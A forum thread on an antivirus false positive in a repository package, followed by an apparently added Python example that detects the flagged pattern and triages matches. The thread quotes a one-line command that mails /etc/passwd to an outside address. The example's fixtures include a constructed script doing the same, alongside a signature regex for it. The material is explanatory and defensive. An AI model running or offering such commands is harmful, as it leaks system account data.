Thread: Virus UNIX.Penguin Detected in Repository

  1. #1
    Join Date
    Oct 2007
    Beans
    6

    Virus UNIX.Penguin Detected in Repository

    I recently used apt-mirror to grab the repositories for Dapper (6.06 LTS) and for Intrepid (8.04 LTS). I ran a virus scan on the entire 80 gigs of stuff and Symantec found a security risk known as "Unix.Penguin" inside the Cappuccino package (version 0.5.something). Supposedly this security risk is a shell script that attempts to e-mail password databases etc. Can someone confirm that this threat exists or provide a reasonable explanation as to why this was detected as a threat?

    Thank you,
    Tom

  2. #2
    Join Date
    Aug 2006
    Beans
    13,354
    Distro
    Ubuntu Mate 20.04 Focal Fossa

    Re: Virus UNIX.Penguin Detected in Repository

    Could be a false positive, for example. Try a couple of online scanners on that package to confirm.
    As an afterthought, I wonder what virus scanner you used, and whether there are any with databases for Linux.

  3. #3
    Join Date
    Aug 2006
    Location
    Kent, UK
    Beans
    57
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: Virus UNIX.Penguin Detected in Repository

    Quote: Originally Posted by tlutz
    Can someone confirm that this threat exists or provide a reasonable explanation as to why this was detected as a threat?

    Thank you,
    Tom
    I think as said above it is a false positive. Line 25 of compileline.grm in the source package for the program contains this command which is probably what causes Symantec to complain:
    Code:
    cat /etc/passwd | mail president@whitehouse.gov
    But I don't think it executes that code at all. The compileline.grm file contains lots of possible commands and parts of commands that are then put together to come up with random commands, which the program then displays on the screen to make it look like you are doing work (as you can see in the attached screenshot).

    I assume Symantec just searches files for commands similar to the one above, and just assumes it's a virus regardless of context (it doesn't understand that the command is just a text string that doesn't get executed).

  4. #4
    Join Date
    Oct 2007
    Beans
    6

    Re: Virus UNIX.Penguin Detected in Repository

    Thanks for the prompt responses. Symantec did detect the 'risk' in the 'compileline.grm' file, so I think you are right about line 25.

    Cheers,
    Tom

  5. #5
    Join Date
    Nov 2006
    Location
    Belgium
    Beans
    3,025
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: Virus UNIX.Penguin Detected in Repository

    Quote: Originally Posted by aos101
    I assume Symantec just searches files for commands similar to the one above.
    Your assumption is correct. Symantec defines Unix.Penguin as "a shell script that mails out the passwd file". A text file probably qualifies as shell script, so it fits their definition.

    Their recommended cure is "delete the shell script".

    http://www.symantec.com/security_res...041803-0917-99
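
The false positive discussed in this thread, as an added example that is not part of any post and not Symantec's actual rule: a content signature modelled on the quoted command matches the text wherever it appears, and a triage step then checks whether the flagged file is set up to be run. The regex, file names and sample contents are constructed assumptions.

```python
import os, re, stat, tempfile

# Content signature modelled on the command quoted in the thread (an assumption
# about how such a rule might look, not Symantec's actual definition).
SIGNATURE = re.compile(r"cat\s+/etc/passwd\s*\|\s*mail\b")

def signature_hits(path):
    """Return (line_number, text) for each line the signature matches."""
    with open(path, "r", errors="replace") as fh:
        return [(n, line.strip()) for n, line in enumerate(fh, 1)
                if SIGNATURE.search(line)]

def triage(path):
    """Classify a file: no match, match in a runnable script, or match in plain data."""
    hits = signature_hits(path)
    if not hits:
        return "clean", hits
    with open(path, "rb") as fh:
        shebang = fh.read(2) == b"#!"
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    executable = bool(os.stat(path).st_mode & exec_bits)
    if shebang or executable:
        return "review", hits             # file is set up to be run
    return "likely-false-positive", hits  # string is present only as data

def demo():
    """Build constructed sample files and return {name: (verdict, hits)}."""
    samples = {
        # Constructed stand-in for a grammar file holding command fragments as text.
        "sample.grm": ("command: ls -la\n"
                       "command: make all\n"
                       "command: cat /etc/passwd | mail president@whitehouse.gov\n", 0o644),
        # Constructed script with the same pattern, a shebang and the exec bit set.
        "sample.sh": ("#!/bin/sh\ncat /etc/passwd | mail user@example.invalid\n", 0o755),
        "notes.txt": ("nothing of interest here\n", 0o644),
    }
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, (text, mode) in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write(text)
            os.chmod(path, mode)
            results[name] = triage(path)
    return results

if __name__ == "__main__":
    for name, (verdict, hits) in demo().items():
        print(name, verdict, hits)
```

A missing shebang and exec bit do not prove the text is never run, so the remaining check is whether the program ever passes those strings to a shell.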
